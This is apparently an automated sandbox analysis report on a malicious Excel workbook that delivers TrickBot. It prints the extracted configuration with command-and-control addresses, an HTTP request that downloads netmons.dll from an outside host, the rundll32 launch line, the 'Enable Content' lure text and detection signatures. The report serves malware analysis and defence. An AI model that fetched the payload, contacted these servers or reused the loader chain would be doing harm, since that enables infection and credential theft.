Analysis Report SecuriteInfo.com.Heur.32219.22782

Overview

General Information

Sample Name:	SecuriteInfo.com.Heur.32219.22782 (renamed file extension from 22782 to xls)
Analysis ID:	412857
MD5:	1ce9bb4784ef70cd5d09291a5005ab51
SHA1:	f4c3e4d7be3e6855c0272b0c2f3a2833bd6963a1
SHA256:	dfae46a2c8083b6cf4f91691289ca97cbcc002126058a2900f09564edccffdfb
Infos:
Most interesting Screenshot:

Detection

Hidden Macro 4.0 TrickBot

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Document exploit detected (creates forbidden files)

Document exploit detected (drops PE files)

Found malware configuration

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Yara detected Trickbot

Document exploit detected (UrlDownloadToFile)

Document exploit detected (process start blacklist hit)

Drops PE files to the user root directory

Found Excel 4.0 Macro with suspicious formulas

Office process drops PE file

Sigma detected: Microsoft Office Product Spawning Windows Shell

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Contains functionality to dynamically determine API calls

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Document contains embedded VBA macros

Downloads executable code via HTTP

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the user directory

Drops files with a non-matching file extension (content does not match file extension)

Found dropped PE file which has not been started or loaded

IP address seen in connection with other malware

Potential document exploit detected (performs DNS queries)

Potential document exploit detected (performs HTTP gets)

Potential document exploit detected (unknown TCP traffic)

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Signatures

AV Detection:

Found malware configuration

Source: 00000004.00000002.2100678651.0000000000470000.00000040.00000001.sdmp

Malware Configuration Extractor: Trickbot {"ver": "2000029", "gtag": "net15", "servs": ["103.66.72.217:443", "117.252.68.211:443", "103.124.173.35:443", "115.73.211.230:443", "117.54.250.246:443", "131.0.112.122:443", "69.109.35.254:20445", "43.17.158.63:36366", "130.180.24.227:44321", "131.168.228.35:19932", "185.31.222.247:49372", "151.187.13.249:46881", "190.186.36.209:40737", "42.139.161.213:11056", "23.95.165.4:64265", "189.169.15.32:42761", "125.6.227.80:58405", "217.159.190.123:8412", "47.106.66.231:10710", "46.136.156.92:5385"], "autorun": ["pwgrabb", "pwgrabc"], "ecc_key": "RUNTMzAAAAAL/ZqmMPBLaRfg1hPOtFJrZz2Zi2/EC4B3fiX8VnaOUVKndBr+jEqWc7mw4v3ADTiwp64K5QKe1LZ27jUZxL4bWjxARPo85hv72nuedeZhRQ+adQQ/gIsV869MycRzghc="}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\netmons[1].dll	ReversingLabs: Detection: 12%
Source: C:\Users\user\hsdksksk.iem	ReversingLabs: Detection: 12%

Multi AV Scanner detection for submitted file

Source: SecuriteInfo.com.Heur.32219.xls

Virustotal: Detection: 8%

Perma Link

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:	Binary string: k:\MSSniffer\Release\Sniffer.pdb\A source: hsdksksk.iem.0.dr
Source:	Binary string: k:\MSSniffer\Release\Sniffer.pdb source: hsdksksk.iem.0.dr

Software Vulnerabilities:

Document exploit detected (creates forbidden files)

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\netmons[1].dll

Jump to behavior

Document exploit detected (drops PE files)

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: netmons[1].dll.0.dr

Jump to dropped file

Document exploit detected (UrlDownloadToFile)

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Section loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA

Jump to behavior

Document exploit detected (process start blacklist hit)

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Process created: C:\Windows\System32\rundll32.exe

Potential document exploit detected (performs DNS queries)

Source: global traffic

DNS query: name: koneckotechnology.com

Potential document exploit detected (performs HTTP gets)

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 198.54.114.131:80

Potential document exploit detected (unknown TCP traffic)

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 198.54.114.131:80

Networking:

Downloads executable code via HTTP

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKdate: Wed, 12 May 2021 23:49:19 GMTserver: Apachelast-modified: Wed, 12 May 2021 13:22:52 GMTaccept-ranges: bytescontent-length: 643072content-type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 67 5d 9f e5 23 3c f1 b6 23 3c f1 b6 23 3c f1 b6 a0 34 ae b6 29 3c f1 b6 d9 1f e8 b6 25 3c f1 b6 30 34 ac b6 21 3c f1 b6 26 30 fe b6 38 3c f1 b6 26 30 ae b6 a9 3c f1 b6 23 3c f0 b6 62 3e f1 b6 a0 34 ac b6 30 3c f1 b6 26 30 91 b6 57 3c f1 b6 26 30 ad b6 22 3c f1 b6 cf 37 af b6 22 3c f1 b6 26 30 ab b6 22 3c f1 b6 52 69 63 68 23 3c f1 b6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 c1 ab 9b 60 00 00 00 00 00 00 00 00 e0 00 0e 21 0b 01 07 0a 00 80 02 00 00 40 07 00 00 00 00 00 9a f2 00 00 00 10 00 00 00 90 02 00 00 00 00 10 00 10 00 00 00 10 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 0a 00 00 10 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 3e 03 00 45 00 00 00 5c 21 03 00 04 01 00 00 00 a0 03 00 7c cf 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 09 00 80 34 00 00 a0 95 02 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 e6 02 00 48 00 00 00 00 00 00 00 00 00 00 00 00 90 02 00 94 05 00 00 d4 20 03 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 9e 78 02 00 00 10 00 00 00 80 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 55 ae 00 00 00 90 02 00 00 b0 00 00 00 90 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 a4 59 00 00 00 40 03 00 00 30 00 00 00 40 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 7c cf 05 00 00 a0 03 00 00 d0 05 00 00 70 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 04 81 00 00 00 70 09 00 00 90 00 00 00 40 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0

IP address seen in connection with other malware

Source: Joe Sandbox View

IP Address: 198.54.114.131 198.54.114.131

Uses a known web browser user agent for HTTP communication

Source: global traffic

HTTP traffic detected: GET /netmons.dll HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: koneckotechnology.comConnection: Keep-Alive

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\70BA6ED2.emf

Jump to behavior

Source: global traffic

Source: rundll32.exe, 00000003.00000002.2101618161.0000000001C50000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2100870975.0000000001E70000.00000002.00000001.sdmp

String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)

Source: unknown

DNS traffic detected: queries for: koneckotechnology.com

Source: rundll32.exe, 00000003.00000002.2101618161.0000000001C50000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2100870975.0000000001E70000.00000002.00000001.sdmp	String found in binary or memory: http://investor.msn.com
Source: rundll32.exe, 00000003.00000002.2101618161.0000000001C50000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2100870975.0000000001E70000.00000002.00000001.sdmp	String found in binary or memory: http://investor.msn.com/
Source: rundll32.exe, 00000003.00000002.2101849521.0000000001E37000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2101059002.0000000002057000.00000002.00000001.sdmp	String found in binary or memory: http://localizability/practices/XML.asp
Source: rundll32.exe, 00000003.00000002.2101849521.0000000001E37000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2101059002.0000000002057000.00000002.00000001.sdmp	String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: rundll32.exe, 00000003.00000002.2101849521.0000000001E37000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2101059002.0000000002057000.00000002.00000001.sdmp	String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: rundll32.exe, 00000003.00000002.2101849521.0000000001E37000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2101059002.0000000002057000.00000002.00000001.sdmp	String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: rundll32.exe, 00000003.00000002.2101618161.0000000001C50000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2100870975.0000000001E70000.00000002.00000001.sdmp	String found in binary or memory: http://www.hotmail.com/oe
Source: rundll32.exe, 00000003.00000002.2101849521.0000000001E37000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2101059002.0000000002057000.00000002.00000001.sdmp	String found in binary or memory: http://www.icra.org/vocabulary/.
Source: rundll32.exe, 00000003.00000002.2101618161.0000000001C50000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2100870975.0000000001E70000.00000002.00000001.sdmp	String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: rundll32.exe, 00000004.00000002.2100870975.0000000001E70000.00000002.00000001.sdmp	String found in binary or memory: http://www.windows.com/pctv.

System Summary:

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Source: Screenshot number: 4	Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 ProtectedView Tht
Source: Screenshot number: 4	Screenshot OCR: Enable Content 21 22 23 24 25 :: "" M"crosoft U McAfee a OffiCC 28 29 30 31 32 33 34 3
Source: Screenshot number: 8	Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 ProtectedView Tht
Source: Screenshot number: 8	Screenshot OCR: Enable Content 21 22 23 24 25 :: "" M"crosoft U McAfee a OffiCC 28 29 30 31 32 33 34 3
Source: Screenshot number: 12	Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 ProtectedView Tht
Source: Screenshot number: 12	Screenshot OCR: Enable Content 21 22 23 24 25 :: "" M"crosoft U McAfee a OffiCC 28 29 30 31 32 33 34 3
Source: Screenshot number: 16	Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 ProtectedView Tht
Source: Screenshot number: 16	Screenshot OCR: Enable Content 21 22 23 24 25 :: "" M"crosoft U McAfee a OffiCC 28 29 30 31 32 33 34 3
Source: Screenshot number: 20	Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 ProtectedView Tht
Source: Screenshot number: 20	Screenshot OCR: Enable Content 21 22 23 24 25 :: "" M"crosoft U McAfee a OffiCC 28 29 30 31 32 33 34 3
Source: Screenshot number: 24	Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 ProtectedView Tht
Source: Screenshot number: 24	Screenshot OCR: Enable Content 21 22 23 24 25 :: "" M"crosoft U McAfee a OffiCC 28 29 30 31 32 33 34 3
Source: Screenshot number: 28	Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 ProtectedView Tht
Source: Screenshot number: 28	Screenshot OCR: Enable Content 21 22 23 24 25 :: "" M"crosoft U McAfee a OffiCC 28 29 30 31 32 33 34 3
Source: Screenshot number: 32	Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 ProtectedView Tht
Source: Screenshot number: 32	Screenshot OCR: Enable Content 21 22 23 24 25 :: "" M"crosoft U McAfee a OffiCC 28 29 30 31 32 33 34 3
Source: Screenshot number: 36	Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 ProtectedView Tht
Source: Screenshot number: 36	Screenshot OCR: Enable Content 21 22 23 24 25 :: "" M"crosoft U McAfee a OffiCC 28 29 30 31 32 33 34 3
Source: Screenshot number: 40	Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 ProtectedView Tht
Source: Screenshot number: 40	Screenshot OCR: Enable Content 21 22 23 24 25 :: "" M"crosoft U McAfee a OffiCC 28 29 30 31 32 33 34 3
Source: Screenshot number: 44	Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 ProtectedView Tht
Source: Screenshot number: 44	Screenshot OCR: Enable Content 21 22 23 24 25 :: "" M"crosoft U McAfee a OffiCC 28 29 30 31 32 33 34 3
Source: Screenshot number: 48	Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 ProtectedView Tht
Source: Screenshot number: 48	Screenshot OCR: Enable Content 21 22 23 24 25 :: "" M"crosoft U McAfee a OffiCC 28 29 30 31 32 33 34 3
Source: Screenshot number: 52	Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 ProtectedView Tht
Source: Screenshot number: 52	Screenshot OCR: Enable Content 21 22 23 24 25 :: "" M"crosoft U McAfee a OffiCC 28 29 30 31 32 33 34 3
Source: Screenshot number: 56	Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 ProtectedView Tht
Source: Screenshot number: 56	Screenshot OCR: Enable Content 21 22 23 24 25 :: "" M"crosoft U McAfee a OffiCC 28 29 30 31 32 33 34 3
Source: Screenshot number: 60	Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 ProtectedView Tht
Source: Screenshot number: 60	Screenshot OCR: Enable Content 21 22 23 24 25 :: "" M"crosoft U McAfee a OffiCC 28 29 30 31 32 33 34 3
Source: Screenshot number: 64	Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 ProtectedView Tht
Source: Screenshot number: 64	Screenshot OCR: Enable Content 21 22 23 24 25 :: "" M"crosoft U McAfee a OffiCC 28 29 30 31 32 33 34 3
Source: Screenshot number: 68	Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 ProtectedView Tht
Source: Screenshot number: 68	Screenshot OCR: Enable Content 21 22 23 24 25 :: "" M"crosoft U McAfee a OffiCC 28 29 30 31 32 33 34 3
Source: Screenshot number: 72	Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 ProtectedView Tht
Source: Screenshot number: 72	Screenshot OCR: Enable Content 21 22 23 24 25 :: "" M"crosoft U McAfee a OffiCC 28 29 30 31 32 33 34 3
Source: Screenshot number: 76	Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 ProtectedView Tht
Source: Screenshot number: 76	Screenshot OCR: Enable Content 21 22 23 24 25 :: "" M"crosoft U McAfee a OffiCC 28 29 30 31 32 33 34 3
Source: Screenshot number: 80	Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 ProtectedView Tht
Source: Screenshot number: 80	Screenshot OCR: Enable Content 21 22 23 24 25 :: "" M"crosoft U McAfee a OffiCC 28 29 30 31 32 33 34 3
Source: Screenshot number: 84	Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 ProtectedView Tht
Source: Screenshot number: 84	Screenshot OCR: Enable Content 21 22 23 24 25 :: "" M"crosoft U McAfee a OffiCC 28 29 30 31 32 33 34 3
Source: Screenshot number: 88	Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 ProtectedView Tht
Source: Screenshot number: 88	Screenshot OCR: Enable Content 21 22 23 24 25 :: "" M"crosoft U McAfee a OffiCC 28 29 30 31 32 33 34 3
Source: Screenshot number: 92	Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 ProtectedView Tht
Source: Screenshot number: 92	Screenshot OCR: Enable Content 21 22 23 24 25 :: "" M"crosoft U McAfee a OffiCC 28 29 30 31 32 33 34 3
Source: Screenshot number: 96	Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 ProtectedView Tht
Source: Screenshot number: 96	Screenshot OCR: Enable Content 21 22 23 24 25 :: "" M"crosoft U McAfee a OffiCC 28 29 30 31 32 33 34 3
Source: Screenshot number: 100	Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 ProtectedView Tht
Source: Screenshot number: 100	Screenshot OCR: Enable Content 21 22 23 24 25 :: "" M"crosoft U McAfee a OffiCC 28 29 30 31 32 33 34 3
Source: Screenshot number: 104	Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 ProtectedView Tht
Source: Screenshot number: 104	Screenshot OCR: Enable Content 21 22 23 24 25 :: "" M"crosoft U McAfee a OffiCC 28 29 30 31 32 33 34 3
Source: Screenshot number: 108	Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 ProtectedView Tht
Source: Screenshot number: 108	Screenshot OCR: Enable Content 21 22 23 24 25 :: "" M"crosoft U McAfee a OffiCC 28 29 30 31 32 33 34 3
Source: Screenshot number: 112	Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 ProtectedView Tht
Source: Screenshot number: 112	Screenshot OCR: Enable Content 21 22 23 24 25 :: "" M"crosoft U McAfee a OffiCC 28 29 30 31 32 33 34 3
Source: Screenshot number: 116	Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 ProtectedView Tht
Source: Screenshot number: 116	Screenshot OCR: Enable Content 21 22 23 24 25 :: "" M"crosoft U McAfee a OffiCC 28 29 30 31 32 33 34 3
Source: Screenshot number: 120	Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 ProtectedView Tht
Source: Screenshot number: 120	Screenshot OCR: Enable Content 21 22 23 24 25 :: "" M"crosoft U McAfee a OffiCC 28 29 30 31 32 33 34 3
Source: Screenshot number: 124	Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 ProtectedView Tht
Source: Screenshot number: 124	Screenshot OCR: Enable Content 21 22 23 24 25 :: "" M"crosoft U McAfee a OffiCC 28 29 30 31 32 33 34 3
Source: Screenshot number: 128	Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 ProtectedView Tht
Source: Screenshot number: 128	Screenshot OCR: Enable Content 21 22 23 24 25 :: "" M"crosoft U McAfee a OffiCC 28 29 30 31 32 33 34 3
Source: Screenshot number: 132	Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 ProtectedView Tht
Source: Screenshot number: 132	Screenshot OCR: Enable Content 21 22 23 24 25 :: "" M"crosoft U McAfee a OffiCC 28 29 30 31 32 33 34 3
Source: Screenshot number: 136	Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 ProtectedView Tht
Source: Screenshot number: 136	Screenshot OCR: Enable Content 21 22 23 24 25 :: "" M"crosoft U McAfee a OffiCC 28 29 30 31 32 33 34 3
Source: Screenshot number: 140	Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 ProtectedView Tht
Source: Screenshot number: 140	Screenshot OCR: Enable Content 21 22 23 24 25 :: "" M"crosoft U McAfee a OffiCC 28 29 30 31 32 33 34 3
Source: Screenshot number: 144	Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 ProtectedView Tht
Source: Screenshot number: 144	Screenshot OCR: Enable Content 21 22 23 24 25 :: "" M"crosoft U McAfee a OffiCC 28 29 30 31 32 33 34 3

Found Excel 4.0 Macro with suspicious formulas

Source: SecuriteInfo.com.Heur.32219.xls

Initial sample: EXEC

Office process drops PE file

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\hsdksksk.iem			Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\netmons[1].dll			Jump to dropped file

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write			Jump to behavior

Document contains embedded VBA macros

Source: SecuriteInfo.com.Heur.32219.xls

OLE indicator, VBA macros: true

Dropped file seen in connection with other malware

Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\netmons[1].dll 697DEA4B154178E8DE096C66167B539AA4465155D294B11765F1A1886EB7C56D
Source: Joe Sandbox View	Dropped File: C:\Users\user\hsdksksk.iem 697DEA4B154178E8DE096C66167B539AA4465155D294B11765F1A1886EB7C56D

Yara signature match

Source: SecuriteInfo.com.Heur.32219.xls, type: SAMPLE

Matched rule: SUSP_EnableContent_String_Gen date = 2019-02-12, hash1 = 525ba2c8d35f6972ac8fcec8081ae35f6fe8119500be20a4113900fe57d6a0de, author = Florian Roth, description = Detects suspicious string that asks to enable active content in Office Doc, reference = Internal Research

Source: rundll32.exe, 00000003.00000002.2101618161.0000000001C50000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2100870975.0000000001E70000.00000002.00000001.sdmp

Binary or memory string: .VBPud<_

Source: classification engine

Classification label: mal100.troj.expl.evad.winXLS@7/7@1/1

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\GDIPFONTCACHEV1.DAT

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRD6FD.tmp

Jump to behavior

Source: SecuriteInfo.com.Heur.32219.xls

OLE indicator, Workbook stream: true

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\rundll32.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Process created: C:\Windows\System32\rundll32.exe rundll32 ..\hsdksksk.iem,StartW

Source: SecuriteInfo.com.Heur.32219.xls

Virustotal: Detection: 8%

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\rundll32.exe rundll32 ..\hsdksksk.iem,StartW
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\hsdksksk.iem,StartW
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\System32\wermgr.exe C:\Windows\system32\wermgr.exe
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\rundll32.exe rundll32 ..\hsdksksk.iem,StartW	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\hsdksksk.iem,StartW	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\System32\wermgr.exe C:\Windows\system32\wermgr.exe	Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:	Binary string: k:\MSSniffer\Release\Sniffer.pdb\A source: hsdksksk.iem.0.dr
Source:	Binary string: k:\MSSniffer\Release\Sniffer.pdb source: hsdksksk.iem.0.dr

Data Obfuscation:

Contains functionality to dynamically determine API calls

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 4_2_003A1030 LoadLibraryW,GetProcAddress,SetLastError,SetLastError,SetLastError,SetLastError,GetNativeSystemInfo,SetLastError,SetLastError,GetProcessHeap,RtlAllocateHeap,SetLastError,

4_2_003A1030

Uses code obfuscation techniques (call, push, ret)

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 4_2_00485950 push dword ptr [edx+14h]; ret

4_2_00485A5D

Persistence and Installation Behavior:

Drops PE files

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\hsdksksk.iem			Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\netmons[1].dll			Jump to dropped file

Drops PE files to the user directory

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\hsdksksk.iem

Jump to dropped file

Drops files with a non-matching file extension (content does not match file extension)

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\hsdksksk.iem

Jump to dropped file

Boot Survival:

Drops PE files to the user root directory

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\hsdksksk.iem

Jump to dropped file

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
